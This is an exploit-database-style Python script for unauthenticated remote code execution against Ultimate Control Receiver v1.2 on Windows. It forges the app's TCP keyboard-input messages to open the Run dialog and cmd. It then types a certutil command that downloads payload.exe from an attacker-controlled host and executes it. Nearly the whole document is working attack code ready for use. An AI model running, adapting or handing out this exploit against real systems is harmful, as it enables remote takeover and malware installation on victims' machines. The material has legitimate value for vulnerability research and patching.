# Exploit Title: Ultimate Control Receiver (v1.2) - Remote Code Execution
# Date: 2/08/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.negusoft.com/
# Software Link: https://www.negusoft.com/ucontrol/downloads/pc.html
# Version: 1.2
# Tested on: Windows 10


'''
Description:

Ultimate Control Receiver v1.2 is vulnerable to unauthenticated remote code
execution. An attacker can exploit the keyboard input functionality over
TCP to execute arbitrary system commands on the target machine without user
interaction.

'''


import socket
import time
import struct

TARGET_IP = "192.168.1.203"
TARGET_PORT = 13894
LHOST = "192.168.1.63"

VK_RETURN = 0x0D
VK_LWIN = 0x5B
VK_R = 0x52

def create_type_char_message(character):
    msg = bytearray(32)
    msg[0] = 18
    msg[1] = 18
    char_code = ord(character)
    struct.pack_into(">I", msg, 4, char_code)
    struct.pack_into(">Q", msg, 24, int(time.time() * 1000))
    return msg

def create_key_input_message(vk_code, input_type=0, command=False):
    msg = bytearray(32)
    msg[0] = 17
    msg[1] = 17
    flags = 1 << 4 if command else 0
    msg[2] = flags
    if input_type == 0:
        msg[3] = 0
    elif input_type == 1:
        msg[3] = 3
    elif input_type == 2:
        msg[3] = 1
    struct.pack_into(">I", msg, 4, vk_code)
    struct.pack_into(">Q", msg, 24, int(time.time() * 1000))
    return msg

def send_character(sock, character):
    sock.send(create_type_char_message(character))
    time.sleep(0.05)

def send_string(sock, text):
    for char in text:
        send_character(sock, char)

def send_win_r():
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(5)
        try:
            s.connect((TARGET_IP, TARGET_PORT))
            s.sendall(bytes([3, 3] + [0]*30))
            s.recv(32)
            s.send(create_key_input_message(VK_LWIN, 2, True))
            s.send(create_key_input_message(VK_R, 2, True))
            s.send(create_key_input_message(VK_R, 1, True))
            s.send(create_key_input_message(VK_LWIN, 1, True))
            time.sleep(0.5)
            return True
        except Exception:
            return False

def send_cmd_command():
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(10)
        try:
            s.connect((TARGET_IP, TARGET_PORT))
            s.sendall(bytes([3, 3] + [0]*30))
            s.recv(32)
            command = f"certutil -urlcache -f http://{LHOST}/payload.exe
\\windows\\temp\\payload.exe && \\windows\\temp\\payload.exe"
            send_string(s, command)
            s.send(create_key_input_message(VK_RETURN))
            return True
        except Exception:
            return False

def main():
    if not send_win_r():
        return
    time.sleep(3)
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(10)
        try:
            s.connect((TARGET_IP, TARGET_PORT))
            s.sendall(bytes([3, 3] + [0]*30))
            s.recv(32)
            send_string(s, "cmd")
            s.send(create_key_input_message(VK_RETURN))
            time.sleep(2)
        except Exception:
            return
    time.sleep(3)
    if not send_cmd_command():
        return

if __name__ == "__main__":
    main()